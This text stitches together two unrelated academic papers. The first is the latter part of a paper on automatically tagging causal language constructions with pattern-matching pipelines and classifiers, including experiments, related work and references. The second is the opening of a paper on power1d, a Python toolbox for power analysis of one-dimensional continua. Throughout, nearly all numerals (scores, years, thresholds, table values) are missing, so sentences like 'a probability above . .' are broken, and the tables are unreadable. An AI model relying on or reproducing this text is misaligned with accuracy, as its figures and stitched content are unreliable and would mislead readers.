connective features: • the label on the dependency from h to its parent • the part of speech of h’s parent • the sequence of connective words* • the sequence of connective lemmas* • each pattern that matched the connective* argument features: • the pos tags of c and e • the generalized pos tags of c and e (e.g., n for either nnp or nns) • the tenses of c and e, both alone and conjoined • the label on each child dependency of c and e • for verbs, the set of child dependency labels • the number of words between c and e • the dependency path between c and e • the length of the dependency path from c to e • each closed-class child lemma of e and of c • the domination relationship between c and e (dominates, dominated by, or independent) • the sets of closed-class child lemmas of e and c • the conjoined ner tags of c and e • initial prepositions of the cause/effect spans, if any • each pos -skip- -gram in the cause/effect spans • each lemma -skip- -gram in the cause/effect spans that was seen at least times in training • each wordnet hypernym of c and e† table : features for the causal language candidate filter. c indicates the cause head, e the effect head, and h the connective head. all non-numeric features are binarized. * used only for per-connective classifiers. † used only for the global classifier. while others are construction-dependent. to incorpo- rate both kinds of information, a separate soft-voting classifier is created for each unique sequence of con- nective words. each classifier averages the proba- bility estimates of three less-reliable classifiers: a global logistic regression classifier, which is shared between all connectives; a per-connective logistic regression classifier; and a per-connective classifier that chooses the most frequent label for that connec- tive. our classifier thus differs slightly from typical voting classifiers: rather than the ensemble consisting of multiple algorithms trained on the same data, our ensemble includes one generalist and two specialists. we use the scikit-learn . . (pedregosa et al., ) implementation of logistic regression with l regularization and balanced class weights. the logis- tic regression classifiers consider a variety of features derived from the matched pattern, the connective words matching, the argument heads, and the parse tree (see table ). an instance is tagged as causal if the soft vote assigns it a probability above . . this cutoff, close to the prior of . , was tuned for f on a different random split of the data than was used in the experiments below. in our experiments, the cutoff made little difference to scores. experiments . baselines our task differs significantly from existing tasks such as frame-semantic parsing, both in the forms of al- lowable triggers and in the semantic relationships tar- geted. our results are therefore not directly compara- ble to a frame-semantic parsing baseline. instead, we compare our end-to-end results against an argument- aware most-frequent-sense (mfs) baseline. at training time, the baseline first extracts the set of sequences of connective lemmas – i.e., {〈prevent, from〉,〈because, of〉, . . .}. it then builds a table t with one entry for each combination of con- nective and argument parse path, recording how many more times it has been causal than non-causal. for example, consider the sentence the flu pre- vented me from attending. 
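the counting scheme behind this baseline (training-time updates just described; test-time lookup described next) can be sketched as follows. the instance fields are illustrative, not the authors' data structures.

```python
from collections import Counter

def train_mfs_baseline(instances):
    """Training-time counting for the argument-aware most-frequent-sense baseline.

    Each instance provides the connective lemma sequence (a tuple, so it is hashable),
    the parse paths to a candidate cause/effect head pair, and whether that tuple
    was annotated as causal."""
    table = Counter()
    for inst in instances:
        key = (inst["connective_lemmas"], inst["cause_path"], inst["effect_path"])
        table[key] += 1 if inst["is_causal"] else -1
    return table

def mfs_is_causal(table, connective_lemmas, cause_path, effect_path):
    # At test time, tag a tuple as causal only if its net count is positive.
    return table[(connective_lemmas, cause_path, effect_path)] > 0
```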
after finding that prevent and from are present in the correct order, the baseline considers every pair (c,e) of non-connective words within a parse radius of two links from the connective. each (c,e) is considered a possible cause/effect head pair for prevent from. for each pair, it finds the shortest path of dependency links from either prevent or from to c and e (call these paths dc and de). if prevent from is annotated as causal, with cause head c and effect head e, the system increments the count t{prevent from, dc, de}; otherwise, it decrements it. the test algorithm finds the same set of possible (connective, cause head, effect head) tuples in the test sentence. for each tuple, if the corresponding entry in t is greater than , the system tags a causal language instance. argument heads are expanded into spans using the algorithm from causeway-s. in addition to an end-to-end baseline, we wished to test how helpful our three-way voting classifier is. for each pipeline, then, we also compare that classifier against a most-frequent-sense baseline that chooses the most frequent label (causal or not-causal) for each connective, with connectives differentiated by their lemma sequences. the baseline classifier has no access to any information about the arguments.

experiment : pipeline comparison

in this experiment, we measured the performance of causeway-s, causeway-l, and the baseline on the tasks of connective discovery and argument id. we also tried taking the union of each system's outputs with the baseline's. because of the small size of because, we report averaged metrics from -fold cross-validation, with fold size measured by sentence count. all pipelines were run on the same folds.

evaluation metrics

for connective discovery, we report precision, recall, and f for connectives, requiring connectives to match exactly. in counting true positives and false negatives, the only gold-standard instances counted are those with both a cause and an effect, in keeping with the task definition. for argument id, we split out metrics by causes and effects. for each, we report:
• percent agreement on exact spans
• percent agreement on heads
• the average jaccard index (jaccard, ) for gold-standard vs. predicted spans, defined as j(a,b) = |a∩b| / |a∪b|, where a and b are the sets of tokens in the two spans. this metric reflects how well the argument spans overlap when they do not match exactly.
all argument metrics are reported only for correctly predicted connectives, as there is no way to automatically evaluate argument spans for false positives. note that as a result, argument id scores are not directly comparable between pipelines – the scores represent how well argument id works given the previous stage, rather than in an absolute sense. we use the same metrics for experiments and .

experiment : ablation studies

our second experiment explores the impact of various design choices by eliminating individual design elements. we report results from using the global and connective-specific classifiers on their own, without the soft-voting ensemble. (the mfs classifier is tested alone as part of experiment .) we also report results from the ensemble classifier without using any features that primarily reflect world knowledge: ner tags, wordnet hypernyms, and lemma skip-grams.

experiment : effects of parse errors

in our third experiment, we examined the effects of parse errors on our pipelines' performance.
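as a concrete reference for the argument-span metrics defined above, the jaccard index over token spans can be computed as in the small standalone illustration below; the token indices are made up for the example.

# jaccard index over token spans, plus the exact-span check, as used for the
# argument id metrics above (illustrative values only).
def jaccard(gold_tokens, predicted_tokens):
    a, b = set(gold_tokens), set(predicted_tokens)
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)

gold_span = {4, 5, 6, 7}   # token indices of a gold-standard cause span
pred_span = {5, 6, 7, 8}   # token indices of a predicted cause span
print(jaccard(gold_span, pred_span))   # 0.6
print(gold_span == pred_span)          # exact-span agreement: False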
we com- pared each pipeline’s performance with and without gold-standard parses, using only the penn treebank portion of because. for gold-standard runs, we used the stanford dependency converter (de marn- effe et al., ) to convert the gold parses into de- pendency format. we report averaged results from -fold cross-validation on this subcorpus. experimental results and analysis . experiment results results from experiment are shown in table . our most important conclusion from these results is that a classifier can indeed learn to recognize many of the subtleties that distinguish causal constructions from their similar non-causal counterparts. even our end-to-end baseline offers moderate performance, but causeway-l outperforms it at connective discovery by over f points, and causeway-s outperforms it by points. the design of the filter is a significant contrib- utor here. the mfs classifier alone substantially underperforms the voting classifier, particularly for the syntactic pipeline. the small connectives filter makes up some of the difference, but the full pipeline still beats the mfs filter by . points for the lexical system and . points for the syntax-based system. when our pipelines are combined with the end-to- end baseline, the results are better still, beating the baseline alone by . points. this supports our hy- pothesis that causal construction recognition rests on a combination of both shallow and deep information. as expected, both pipelines show high recall but low precision for the connective discovery stage. (much of the remaining gap in recall came simply from the long tail of constructions – about half of connective types never saw a pattern match.) the filter does balance out precision and recall for a bet- ter f . however, as the filter’s steep drop in recall suggests, more work is needed to upweight positive instances. examining the classifier scores reveals that the filter is doing a good job of assigning low probability to negative instances: the vast majority of false pattern matches are clustered below a probabil- ity of . , whereas the positives are peppered more evenly over the probability spectrum. unfortunately, the positives’ probabilities are not clustered on the high end, as they should be. significant leverage could be gained just from im- proving classification for the connective to. for both pipelines, this one connective accounted for – % of end-to-end false positives and false negatives, and nearly half of all misclassifications by the filter. many of the remaining errors (about %) came from just a few simple but highly ambiguous/polysemous con- nectives, including if, for, and so. for complex con- structions (mwes or more complex syntactic struc- tures), causeway-l achieved % f and causeway- s achieved %. overall, then, it seems that the classifier is doing well even at the cases that would challenge typical semantic parsing systems, but it needs some features that will allow it to upweight positive instances of a few challenging words. for argument id, both techniques do reasonably well at recovering exact argument spans, and the hc and he columns show that even when the exact spans do not match, the key content words are mostly correct. the low jaccard indices, meanwhile, indi- cate that there is plenty of room for improvement in finding not just heads, but full spans. interestingly, effects seem to be harder to recover than causes. the likely culprit is the difference in lengths between the two types of arguments. 
the distribution of cause lengths is skewed toward low numbers, with a peak at and a median of , while effects have a smoother peak at with a median of (figure ). the difference makes it harder for the system to guess full effect spans, and even for heads there are more plausible options. the length disparity, in turn, is probably due to the fact that causes are likely to be subjects ( %) or nominal modifiers ( %), which skew short, whereas most effects are primary clauses ( %), complements ( %), or direct objects ( %), which are often more complex.

[figure : distributions of cause and effect span lengths in the because corpus (for instances with both arguments); histograms of argument length (in tokens) vs. count, for causes and effects.]

[table : results for experiment . rows: causeway-s and causeway-l, each w/o classifier, w/ mfs, w/ mfs + sc filter, w/ classifier, and w/ classifier + sc filter; plus baseline, baseline + causeway-s, and baseline + causeway-l. columns: connectives (p, r, f), causes (sc, hc, jc), and effects (se, he, je). sc and se indicate exact span match for causes and effects, respectively; hc and he indicate percentage accuracy for cause and effect heads; and jc and je indicate cause and effect jaccard indices. "sc filter" indicates the filter for smaller overlapping connectives. for the combinations of the baseline with causeway, the union of the baseline's and causeway's outputs was passed to the sc filter. (numeric entries omitted.)]

experiment results

results for experiment are shown in table . the results using single classifiers, rather than an ensemble, uphold our design of combining multiple information sources. even the best non-ensemble filter, the per-connective filter in causeway-s, underperforms its ensemble counterpart by . points. likewise, the results from removing world-knowledge features confirm that this knowledge significantly assists the classifier beyond what surface-level features alone can provide. world knowledge features add . points for causeway-l and . points for causeway-s.

experiment results

results from experiment are shown in table . as expected, causeway-s improved significantly with gold-standard parses, whereas causeway-l gets only a tiny boost. surprisingly, causeway-s did not improve from better tregex matching of connectives per se. in fact, all scores for connective matching from the first stage were worse with gold-standard parses. instead, the improvement appears to come from argument identification: better parses made it easier to identify argument heads, which in turn made the many features based on those heads more reliable. this is supported by the high argument head accuracy with gold parses. further, when we ran the baseline on the ptb subcorpus with and without gold parses, we saw a similar improvement. thus, although the limited data and the classifier's failure to upweight positives are still the primary handicaps, better parses would be somewhat helpful for at least the syntax-based approach.

related work

our work is of course based on cxg, which has inspired a number of nlp efforts.
on the language-resource side, the framenet group, noting the many aspects of meaning that are not fully captured in an analysis of lexical triggers, has begun an extensive project to document and annotate grammatical constructions in english (fillmore et al., ).

[table : results for experiment . rows: causeway-s and causeway-l, each with classifiers ablated as follows: none (full pipeline), both per-connective, global/most-freq., and knowledge features. columns: connectives (p, r, f), causes (sc, hc, jc), and effects (se, he, je). unablated full-pipeline results from table are included for comparison. (numeric entries omitted.)]

[table : results for experiment , reported (a) with automatically parsed data and (b) with gold-standard parses. rows: causeway-s and causeway-l, each w/o classifier and w/ classifier + sc filter. columns: connectives (p, r, f), causes (sc, hc, jc), and effects (se, he, je). (numeric entries omitted.)]

similar efforts are underway for verbnet (bonial et al., ) and propbank (bonial et al., ). on the nlp-tools side, some work has been done on parsing text directly into constructions, particularly through the formalisms of fluid construction grammar (steels, ) and embodied construction grammar (bergen and chang, ), which take a "constructions all the way down" approach. some hpsg parsers and formalisms, particularly those based on the english resource grammar (copestake and flickinger, ; flickinger, ) or sign-based construction grammar (boas and sag, ), also take constructions into account. thus far, however, only a few attempts (e.g., hwang and palmer, ) have been made to integrate constructions with robust, broad-coverage nlp tools/representations. other aspects of our work are more closely related to previous nlp research. our task is similar to frame-semantic parsing (baker et al., ), the task of automatically producing framenet annotations. lexical triggers of a frame correspond roughly to our causal connectives, and both tasks require identifying argument spans for each trigger. the tasks differ in that framenet covers a much wider range of semantics, with more frame-specific argument types, but its triggers are limited to lexical units, whereas we permit arbitrary constructions. our multi-stage approach is also loosely inspired by semafor and subsequent framenet parsers (das et al., ; roth and lapata, ; täckström et al., ). several representational schemes have incorporated elements of causal language. pdtb includes reason and result relations; framenet frames often include purpose and explanation roles; preposition schemes (e.g., schneider et al., , ) include some purpose- and explanation-related senses; and verbnet and propbank include verbs of causation. as described in § , however, none of these covers the full range of linguistic realizations of causality. the asfalda french framenet project recently proposed a reorganized frame hierarchy for causality, along with more complete coverage of french causal lexical units (vieu et al., ).
some constructions would still be too complex to represent, but under their framework, many of our insights could likely be merged into mainline english framenet. other projects have attempted to address causality more specifically. for example, a small corpus of event pairs conjoined with and has been annotated as causal or not causal (bethard and martin, ), and a classifier was built for such pairs (bethard et al., ). the caters annotation scheme (mostafazadeh et al., ), based on timeml, also includes causal relations, but from a commonsense reasoning standpoint rather than a linguistic one. a broader-coverage linguistic approach was taken by mirza and tonelli ( ). they enriched timeml to include causal links and their lexical triggers, and built an svm-based system for predicting them. their work differs from ours in that it requires argu- ments to be timeml events; it requires connectives to be contiguous spans; and their classifier relies on gold-standard timeml annotations. more recently, hidey and mckeown ( ) au- tomatically constructed a large dataset with pdtb- style altlex annotations for causality. using this cor- pus, they achieved high accuracy in finding causality indicators. this was a somewhat easier task than ours, given their much larger dataset and that they limited their causal triggers to contiguous phrases. their dataset and methods for constructing it, how- ever, could likely be adapted to improve our systems. our pattern-matching techniques are based on ear- lier work on lexico-syntactic patterns. these patterns, similarly represented as fragments of de- pendency parse trees with slots, have proven useful for hypernym discovery (hearst, ; snow et al., ). they have also been used both for the more limited task of detecting causal verbs (girju, ) and for detecting causation relations that are not ex- clusively verbal (ittoo and bouma, ). our work extends this earlier research in several ways. we propose several methods (crf-based ar- gument id and statistical classifiers) for overcoming the ambiguity inherent in such patterns. we also take care to ground our notion of causality in a princi- pled annotation scheme for causal language. this avoids the difficulties of agreeing on what counts as real-world causation (see grivaz, ). conclusion and future work with this work, we have demonstrated the viability of two approaches to tagging causal constructions. we hope that the constructional perspective will prove applicable to other domains, as well. our code and corpus are available at https://github.com/ duncanka/causeway and https://github. com/duncanka/because, respectively. in the immediate future, we plan to explore more sophisticated, flexible algorithms for tagging causal constructions that rely less on fixed patterns. two promising directions for flexible matching are tree kernels and parse forests (tomita, ). we are also pursuing a neural, transition-based tagging model. in parallel, we are working to extend our ap- proaches to cases where causality is expressed using temporal language or other overlapping relations. we are developing a further expanded corpus that will include annotations for such cases, and we expect to extend our algorithms to these new annotations. in the longer run, we plan to demonstrate the use- fulness of our predicted causal language annotations for an application-oriented semantic task such as question-answering. 
acknowledgments we thank jeremy doornbos, donna gates, nora ka- zour, chu-cheng lin, michael mordowanec, and spencer onuffer for all their help with refining the an- notation scheme and doing the annotation work. we are also grateful to nathan schneider for his invalu- able suggestions, and to the anonymous reviewers and tacl editors for their useful feedback. references collin baker, michael ellsworth, and katrin erk. . semeval’ task : frame semantic struc- ture extraction. in proceedings of the th interna- tional workshop on semantic evaluations, pages – . association for computational linguis- tics, prague, czech republic. collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in proceedings of the th international conference on computational linguistics, volume , pages – . association for computational linguistics, montreal, canada. timothy baldwin and su nam kim. . multi- word expressions. in nitin indurkhya and fred j. damerau, editors, handbook of natural language processing, volume , pages – . crc press, boca raton, fl. jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . modeling biological processes for read- ing comprehension. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – . association for computational linguistics, doha, qatar. benjamin bergen and nancy chang. . embod- ied construction grammar in simulation-based lan- guage understanding. construction grammars: cognitive grounding and theoretical extensions, : – . steven bethard, william j corvey, sara klingenstein, and james h. martin. . building a corpus of temporal-causal structure. in proceedings of the th international conference on language re- sources and evaluation (lrec ), pages – . european languages resources association, marrakech, morocco. steven bethard and james h. martin. . learning semantic links from a corpus of parallel temporal and causal relations. in proceedings of the th annual meeting of the association for computa- tional linguistics on human language technolo- gies (acl- hlt): short papers, pages – . association for computational linguistics, colum- bus, ohio. hans christian boas and ivan a. sag, editors. . sign-based construction grammar. csli publica- tions, stanford, ca. claire bonial, julia bonn, kathryn conger, jena d. hwang, and martha palmer. . propbank: se- mantics of new predicate types. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european languages resources asso- ciation, reykjavik, iceland. claire bonial, susan windisch brown, jena d. hwang, christopher parisien, martha palmer, and suzanne stevenson. . incorporating coercive constructions into a verb lexicon. in proceedings of the acl workshop on relational models of semantics, pages – . association for com- putational linguistics, portland, oregon. juliette conrath, stergos afantenos, nicholas asher, and philippe muller. . unsupervised extrac- tion of semantic relations using discourse cues. in proceedings of the th international conference on computational linguistics (coling ), pages – . dublin city university and as- sociation for computational linguistics, dublin, ireland. ann a copestake and dan flickinger. . an open source grammar development environment and broad-coverage english grammar using hpsg. 
in proceedings of the nd international conference on language resources and evaluation (lrec ), pages – . european language re- sources association, athens, greece. dipanjan das, desai chen, andré f.t. martins, nathan schneider, and noah a. smith. . frame-semantic parsing. computational linguis- tics, ( ): – . marie-catherine de marneffe, bill maccartney, christopher d. manning, et al. . generat- ing typed dependency parses from phrase structure parses. in proceedings of the fifth international conference on language resources and evalua- tion (lrec ), volume , pages – . eu- ropean languages resources association, genoa, italy. stuart dreyfus and robert wagner. . the steiner problem in graphs. networks, ( ): – . jesse dunietz, lori levin, and jaime carbonell. . annotating causal language using corpus lexicog- raphy of constructions. in proceedings of the th linguistic annotation workshop (law ix), pages – . association for computational linguis- tics, denver, co. charles j. fillmore. . encounters with language. computational linguistics, ( ): – . charles j. fillmore, paul kay, and mary catherine o’connor. . regularity and idiomaticity in grammatical constructions: the case of let alone. language, ( ): – . charles j. fillmore, russell lee-goldman, and rus- sell rhodes. . sign-based construction gram- mar, chapter the framenet constructicon, pages – . in boas and sag ( ). dan flickinger. . accuracy vs. robustness in grammar engineering. in emily m. bender and jennifer e. arnold, editors, language from a cog- nitive perspective: grammar, usage, and process- ing, volume of csli lecture notes, pages – . csli publications. roxana girju. . automatic detection of causal relations for question answering. in proceedings of the acl workshop on multilingual summa- rization and question answering, volume , pages – . association for computational linguistics, sapporo, japan. adele goldberg. . constructions: a construc- tion grammar approach to argument structure. chicago university press, chicago, il. cécile grivaz. . human judgements on causa- tion in french texts. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european languages resources association, val- letta, malta. marti a. hearst. . automatic acquisition of hy- ponyms from large text corpora. in proceedings of the th conference on computational linguis- tics, volume , pages – . association for computational linguistics, nantes, france. christopher hidey and kathleen mckeown. . identifying causal relations using parallel wikipedia articles. in proceedings of the th annual meeting of the association for computa- tional linguistics, pages – . association for computational linguistics, berlin, germany. jena d. hwang and martha palmer. . identifica- tion of caused motion constructions. in proceed- ings of the fourth joint conference on lexical and computational semantics (* sem ), pages – . association for computational linguistics, denver, co. ashwin ittoo and gosse bouma. . extracting explicit and implicit causal relations from sparse, domain-specific texts. in proceedings of the th international conference on natural language processing and information systems (nldb ’ ), pages – . springer-verlag, alicante, spain. paul jaccard. . the distribution of the flora in the alpine zone. new phytologist, ( ): – . dan klein and christopher d. manning. . ac- curate unlexicalized parsing. in proceedings of the st annual meeting on association for com- putational linguistics, volume , pages – . 
association for computational linguistics, sap- poro, japan. lori levin, teruko mitamura, davida fromm, brian macwhinney, jaime carbonell, weston feely, robert frederking, anatole gershman, and car- los ramirez. . resources for the detection of conventionalized metaphors in four languages. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european language re- sources association, reykjavik, iceland. roger levy and galen andrew. . tregex and tsurgeon: tools for querying and manipulating tree data structures. in proceedings of the th inter- national conference on language resources and evaluation (lrec ), pages – . eu- ropean language resources association, genoa, italy. mitchell marcus, grace kim, mary ann marcinkiewicz, robert macintyre, ann bies, mark ferguson, karen katz, and britta schas- berger. . the penn treebank: annotating predicate argument structure. in proceedings of the workshop on human language technol- ogy, hlt ’ , pages – . association for computational linguistics, plainsboro, nj. paramita mirza and sara tonelli. . an analysis of causality between events and its relation to tem- poral information. in proceedings of the th inter- national conference on computational linguistics (coling ), pages – . dublin city university and association for computational lin- guistics, dublin, ireland. nasrin mostafazadeh, alyson grealish, nathanael chambers, james allen, and lucy vanderwende. . caters: causal and temporal relation scheme for semantic annotation of event structures. in proceedings of the th workshop on events: definition, detection, coreference, and represen- tation, pages – . association for computa- tional linguistics, san diego, ca. joakim nivre, marie-catherine de marneffe, filip ginter, yoav goldberg, jan hajic, christopher d. manning, ryan mcdonald, slav petrov, sampo pyysalo, natalia silveira, reut tsarfaty, and daniel zeman. . universal dependencies v : a multilingual treebank collection. in proceedings of the th international conference on language resources and evaluation (lrec ). european language resources association, portoro, slove- nia. martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated cor- pus of semantic roles. computational linguistics, ( ): – . fabian pedregosa, gaël varoquaux, alexandre gram- fort, vincent michel, bertrand thirion, olivier grisel, mathieu blondel, peter prettenhofer, ron weiss, vincent dubourg, jake vanderplas, alexan- dre passos, david cournapeau, matthieu brucher, matthieu perrot, and édouard duchesnay. . scikit-learn: machine learning in python. journal of machine learning research, : – . rashmi prasad, nikhil dinesh, alan lee, eleni milt- sakaki, livio robaldo, aravind joshi, and bonnie webber. . the penn discourse treebank . . in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european language re- sources association, marrakech, morocco. michael roth and mirella lapata. . context- aware frame-semantic role labeling. transactions of the association for computational linguistics, : – . evan sandhaus. . the new york times anno- tated corpus. linguistic data consortium. jonathan schaffer. . the metaphysics of causation. in edward n. zalta, editor, the stanford encyclopedia of philosophy. summer edition. http://plato.stanford. edu/archives/sum /entries/ causation-metaphysics/. nathan schneider, jena d. 
hwang, vivek srikumar, meredith green, abhijit suresh, kathryn conger, tim o’gorman, and martha palmer. . a cor- pus of preposition supersenses. in proceedings of the th linguistic annotation workshop (law x), pages – . association for computational linguistics, berlin, germany. nathan schneider, vivek srikumar, jena d. hwang, and martha palmer. . a hierarchy with, of, and for preposition supersenses. in proceedings of the th linguistic annotation workshop (law ix), pages – . association for computational linguistics, denver, co. karin k. schuler. . verbnet: a broad- coverage, comprehensive verb lexicon. ph.d. thesis, university of pennsylvania, philadelphia, pa. aai . noah a. smith, claire cardie, anne washington, and john wilkerson. . overview of the nlp unshared task in poliinformatics. in proceedings of the acl workshop on language tech- nologies and computational social science, pages – . association for computational linguistics, baltimore, md. rion snow, daniel jurafsky, and andrew y. ng. . learning syntactic patterns for automatic hyper- nym discovery. in advances in neural information processing systems (nips ), pages – . mit press, vancouver, canada. luc steels, editor. . computational issues in fluid construction grammar. lecture notes in computer science. springer verlag, berlin, ger- many. oscar täckström, kuzman ganchev, and dipanjan das. . efficient inference and structured learn- ing for semantic role labeling. transactions of the association for computational linguistics, : – . masaru tomita. . an efficient context-free pars- ing algorithm for natural languages. in proceed- ings of the th international joint conference on artificial intelligence (ijcai), volume , pages – . morgan kaufmann publishers inc., los angeles, ca. laure vieu, philippe muller, marie candito, and mar- ianne djemaa. . a general framework for the annotation of causality based on framenet. in pro- ceedings of the th international conference on language resources and evaluation (lrec ), pages – . european language resources association, portoro, slovenia. phillip wolff, bianca klettke, tatyana ventura, and grace song. . expressing causation in en- glish and other languages. in woo-kyoung ahn, robert l. goldstone, bradley c. love, arthur b. markman, and phillip wolff, editors, categoriza- tion inside and outside the laboratory: essays in honor of douglas l. medin, pages – . ameri- can psychological association, washington, dc. submitted april accepted june published july corresponding author todd c. pataky, tpataky@shinshu-u.ac.jp academic editor robert winkler additional information and declarations can be found on page doi . /peerj-cs. copyright pataky distributed under creative commons cc-by . open access power d: a python toolbox for numerical power estimates in experiments involving one-dimensional continua todd c. pataky institute for fiber engineering, shinshu university, ueda, japan abstract the unit of experimental measurement in a variety of scientific applications is the one-dimensional ( d) continuum: a dependent variable whose value is measured repeatedly, often at regular intervals, in time or space. a variety of software packages exist for computing continuum-level descriptive statistics and also for conducting continuum-level hypothesis testing, but very few offer power computing capabilities, where ‘power’ is the probability that an experiment will detect a true continuum signal given experimental noise. 
moreover, no software package yet exists for arbitrary continuum-level signal/noise modeling. this paper describes a package called power d which implements (a) two analytical d power solutions based on random field theory (rft) and (b) a high-level framework for computational power analysis using arbitrary continuum-level signal/noise modeling. first power d's two rft-based analytical solutions are numerically validated using its random continuum generators. second arbitrary signal/noise modeling is demonstrated to show how power d can be used for flexible modeling well beyond the assumptions of rft-based analytical solutions. its computational demands are non-excessive, requiring on the order of only s to execute on standard desktop computers, but with approximate solutions available much more rapidly. its broad signal/noise modeling capabilities along with relatively rapid computations imply that power d may be a useful tool for guiding experimentation involving multiple measurements of similar d continua, and in particular to ensure that an adequate number of measurements is made to detect assumed continuum signals.

subjects scientific computing and simulation, programming languages
keywords gaussian random fields, time series, random field theory, hypothesis testing, computational statistics, data modeling

introduction

analyzing multiple measurements of one-dimensional ( d) continua is common to a variety of scientific applications ranging from annual temperature fluctuations in climatology (fig. ) to position trajectories in robotics. these measurements can be denoted y(q) where y is the dependent variable, q specifies continuum position, usually in space or time, and where the continua are sampled at q discrete points. for the climate data depicted in fig. y is temperature, q is day and q= . measurements of y(q) are often: (i) registered and (ii) smooth. the data are 'registered' in the sense that point q is homologous across multiple continuum measurements.
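because the continua are registered, node-wise summaries and test statistics reduce to column-wise array operations. the following standalone sketch uses plain numpy and scipy with synthetic data and hypothetical sizes; it is illustrative only and is not part of the power d package.

# minimal illustration: mean / sd continua for two groups of registered 1d
# measurements, a pointwise two-sample t continuum, and a bonferroni-corrected
# critical threshold that treats all q nodes as independent. sizes are hypothetical.
import numpy as np
from scipy import stats

J, Q = 10, 365
rng = np.random.default_rng(0)
yA = rng.normal(0.0, 1.0, size=(J, Q)).cumsum(axis=1)   # group a: J continua of length Q
yB = rng.normal(0.1, 1.0, size=(J, Q)).cumsum(axis=1)   # group b

mA, mB = yA.mean(axis=0), yB.mean(axis=0)                # mean continua
sA, sB = yA.std(axis=0, ddof=1), yB.std(axis=0, ddof=1)  # sd continua

sp = np.sqrt((sA ** 2 + sB ** 2) / 2.0)                  # pooled sd (equal group sizes)
t = (mA - mB) / (sp * np.sqrt(2.0 / J))                  # two-sample t continuum, shape (Q,)

alpha = 0.05
t_crit_bonferroni = stats.t.isf(alpha / Q, df=2 * J - 2)
print(t.shape, round(float(t_crit_bonferroni), 2))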
for example, the earth’s rotation is slow enough that day-to-day temperature changes are typically much smaller than season-to-season changes (fig. a). regardless of the physical principles underlying the smoothness, basic information theory in fact requires smooth continua because sufficiently high measurement frequency is needed to avoid signal aliasing. this smoothness has important statistical implications because smoothness means that neighboring points (q and q+ ) are correlated, or equivalently that adjacent points do not vary in a completely independent way. thus, even when q separate values are measured to characterize a single continuum, there may be far fewer than q independent stochastic units underlying that continuum process. the canadian temperature dataset in fig. exhibits both features. the data are naturally registered because each measurement station has one measurement per day over q= days. the data are smooth because, despite relatively high-frequency day-to-day temperature changes, there are also comparatively low-frequency changes over the full year and those low-frequency changes are presumably the signals of interest. having computed mean and variance continua it is natural to ask probabilistic questions regarding them, and two basic kinds of probability questions belong to the categories: (i) classical hypothesis testing and (ii) power analysis. continuum-level hypothesis testing has been well-documented in the literature (friston et al., ; nichols & holmes, ; pataky, ) but power has received comparatively less attention. while this paper focuses on power analysis it is instructive to first consider continuum-level hypothesis testing because those results are what power analysis attempts to control. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.psych.mcgill.ca/misc/fda/downloads/fdafuns/matlab/fdamatlab.zip http://www.psych.mcgill.ca/misc/fda/downloads/fdafuns/matlab/fdamatlab.zip http://dx.doi.org/ . /peerj-cs. day t v al ue test statistic continuum bonferroni threshold ( = . ) rft threshold ( = . ) uncorrected threshold ( = . ) figure two-sample hypothesis test comparing the atlantic and continental regions from fig. . the test statistic continuum is depicted along with uncorrected, random field theory (rft)-corrected and bonferroni-corrected thresholds. continuum-level hypothesis testing classical hypothesis testing can be conducted at the continuum level using a variety of theoretical and computational procedures. in the context of the temperature data (fig. b) a natural hypothesis testing question is: is there is a statistically significant difference between the atlantic and continental mean temperature continua? answering that question requires a theoretical or computational model of stochastic continuum behavior so that probabilities pertaining to particular continuum differences can be calculated. one approach is functional data analysis (fda) (ramsay & silverman, ) which combines ‘basis functions’, or mathematically-defined continua, to model the data. since the basis functions are analytical, one can compute a variety of probabilities associated with their long-term stochastic behavior. a second approach is random field theory (rft) (adler & hasofer, ; hasofer, ) which extends gaussian behavior to the d continuum level via a smoothness parameter (kiebel et al., ) from which a variety of continuum level probabilities can be calculated (friston et al., ). 
a third approach is the non-parametric permutation method of nichols & holmes ( ) which, instead of modeling stochastic continuum behavior directly, instead constructs probability distributions through iterative computation. ultimately these and all other approaches, when used for classical hypothesis testing, offer a correction for multiple comparisons across the q continuum nodes based on continuum smoothness. example hypothesis testing results for the canadian temperature data are depicted in fig. . since there are mean and variance continua it is trivial to compute the test statistic continuum, here as the two-sample t statistic representing the variance-normalized pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. difference between the atlantic and continental regions. the next step is less trivial: finding the critical test statistic threshold. the threshold is meant to represent the value above which purely random test statistic continua (i.e., those produced by random continua when the true continuum difference is null) would traverse in α percent of an infinite number of experiments, where α is the type i error rate and is usually . . of the three thresholds depicted in fig. only one (the rft threshold) is a true continuum-level threshold. the other two depict nappropriate thresholds as references to highlight the meaning of the rft threshold. in particular, the uncorrected threshold (α= . ) is ‘uncorrected’ because it presumes q= ; since q= for these data it is clearly inappropriate. on the other extreme is a bonferroni threshold which assumes that there are q completely independent processes. it is a ‘corrected’ threshold because it acknowledges that q> , but it is inappropriate because it fails to account for continuum smoothness, and thus overestimates the true number of stochastic processes underlying these data. the third method (rft) is also a ‘corrected’ threshold, and it is closest to the true threshold required to control α because it considers both q and smoothness friston et al. ( ). specifically, it assesses inter-node correlation using the d derivative (kiebel et al., ) to lower the estimated number of independent processes, which in turn lowers the critical threshold relative to the bonferroni threshold. this rft approach is described extensively elsewhere friston et al. ( ) and has also been validated extensively for d continua (pataky, ). for this particular dataset the test statistic continuum crosses all three thresholds, implying that the null hypothesis of equivalent mean continua is rejected regardless of correction procedure. if the continuum differences are not as pronounced as they are here, especially near the start and end of the calendar year, the correction procedure would become more relevant to interpretation objectivity. continuum-level power analysis before conducting an experiment for which one intends to conduct classical hypothesis testing it is often useful to conduct power analysis, where ‘power’ represents the probability of detecting a true effect. the main purposes of power analysis are (a) to ensure that an adequate number of measurements is made to elucidate a signal of empirical interest and (b) to ensure that not too many measurements are made, in which case one risks detecting signals that are not of empirical interest. the balance point between (a) and (b) is conventionally set at a power of . , and that convention is followed below. 
